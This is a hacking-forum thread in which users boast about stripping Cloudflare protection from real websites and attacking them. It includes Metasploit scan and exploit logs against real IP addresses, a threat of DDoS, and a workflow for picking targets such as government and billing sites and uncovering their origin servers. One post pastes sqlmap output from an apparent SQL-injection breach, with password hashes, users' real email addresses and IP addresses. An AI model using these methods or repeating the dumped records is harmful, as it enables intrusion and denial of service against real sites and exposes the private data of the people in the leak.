Cloudflare....
#1
.................is -> Shit!

0day.today <------------------
______________
104.24.127.207  
Organization         
Cloudflare              
Country                 
United States           
______________

Hitting them hard in a bit Wink

https://paste.sh/DGn1G1f4#eMWNb_c1gbAs1xyrdy1ZCp8W <---------
Reply
#2
[+] Your collections are located at: /root/.msf4/loot/20171223194654_default_unknown_mongo_injection._350626.txt
[+] http://151.80.37.69:80/IciActionItemServ...mConf?wsdl - redirected (302) to https://www.poneyy.fr/IciActionItemServi...mConf?wsdl (not following)
[+] http://151.80.37.118:80/IciActionItemSer...mConf?wsdl - redirected (301) to https://hermes.thinleen.fr/IciActionItem...mConf?wsdl (not following)
[*] 151.80.37.89:8000 [SAP] Trying 001:SOLMAN_BTC:init1234
[+] http://151.80.37.74:80/htmlb/ - redirected (302) to https://151.80.37.74/htmlb/ (not following)
[*] Exploit running as background job 190.
[+] http://151.80.37.67:80/IciChatLineServic...atLineConf - redirected
151.80.37.64 80 tcp http open nginx/1.10.2
151.80.37.71 79 tcp finger open
151.80.37.80 111 udp sunrpc open 100000 v3
151.80.37.113 79 tcp finger open

*********************Admin appars live and interacting against attacks..

root IP=resolved, to ddos or not >Smile
Reply
#3
how did you manage to get the ip tho
Reply
#4
Haha interesting! So you're using a dedicated script for resolving CF?

Are you using Shodan, Censys or something like that? Pretty effective in my experience if you leave backend open with information correlating to the domain name. I've made that mistake before.
Reply
#5
(12-24-2017, 04:21 PM)PunySh3r Wrote: how did you manage to get the ip tho

Code:
# Save >> https://paste.sh/-8MDrWc4#c-y0g56TpIds0HlOHnjLxSAw Into "Script.rb"

root@tor:~# curl -o CloudFlareHosted.txt https://raw.githubusercontent.com/pirate/sites-using-cloudflare/master/sorted_unique_cf.txt

grep "$word" CloudFlareHosted.txt (word="hosting, courthouse, billing, pos, corporate, state, gov, department, enterprise etc..")




# Run >> ruby Script.rb --byp Url
Anyone can Resolve cloudflare as long as they have not properly configured their site...

The real skill is in hitting the resolved site.

Code:
15:02:41] [INFO] retrieved: fde100273c73c7398866d73e945ed370aec090a7
[15:02:41] [INFO] retrieved: fecc2421ab336f20482a232b2143bd368c28d3cb
[15:02:41] [INFO] retrieved: ff48f1256e881258c09871ec96f9f3c8be0dec37
[15:02:42] [INFO] retrieved: ff260322ccdbcbdfc72fbd5719b94f46dcfdb7a8
[15:02:42] [INFO] retrieved: ff5fac52fbbef10b43292d284c7b92c98011532a
[15:02:42] [INFO] retrieved: ffc0e9e2677008c85578ac58dce85a4b9a7d83c2
[15:02:43] [INFO] recognized possible password hashes in column 'passwd'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N]

1            | <blank>       | pilou.1542@gmail.com                  | d9d5          | Chapeau Ch\xe2teau Chameau                                  | <blank>                                                            | <blank>                                 | <blank>        | <blank>        | 1               | 0               | 1               | 1474485232      | <blank>                                   | 0                | 0                | 1                 | <blank>           | 1                    | 1756                 |

| 17       | 3        | 20        | <blank>    | 1          | 15            | <blank>         | 2117              | <blank> | <blank>                 | <blank> | <blank>  | 172   | 0      | 6bafe7473ca61948a3694cceb905a08d725bdab9                | 0      | <blank>                                                                                           | <blank>                          | <blank>     | 0       | <blank>    | <blank>                          | <blank>  | 0        | <blank>            | <blank>                          | <blank>   | 0         | 86.218.234.183  | 1677-07-13 | AvA FOUDROYOR       | <blank>           | <blank>   | Approuv\xe9 par Raptor J\xe9sus et la mis\xe9ricorde de la table                                                                                                                                                                      | 86.218.234.183  | <blank>    | 0          | <blank>    | 1514037799 | <blank>    | <blank>    | FOUDROYOR           | <blank>                                                                                        | <blank>     | 1           | 0           | <blank>      | 2            | 1            | <blank>       | foudroyor@hotmail.fr                  | e3f0          | <blank>                                                     | <blank>  

current user is DBA:    True

database management system users [6]:
web server operating system: Linux Debian 8.0 (jessie)
web application technology: Apache 2.4.10
back-end DBMS operating system: Linux
back-end DBMS: active fingerprint: MySQL >= 5.5.0
               banner parsing fingerprint: MySQL 5.5.58

:::0day = Dumping::::

Resolving ip is simple anyone can do this, taking on a site is the real test of knowledge + skill...
Reply
#6
You might also be interested in cfire and sites like crimeflare which is used by that ruby script. Simply enter the domain name into the crimeflare search bar and it sometimes produces the websites real IP address.
Reply
#7
As a Chinese baby said they do not understand the process of introducing your tools
Reply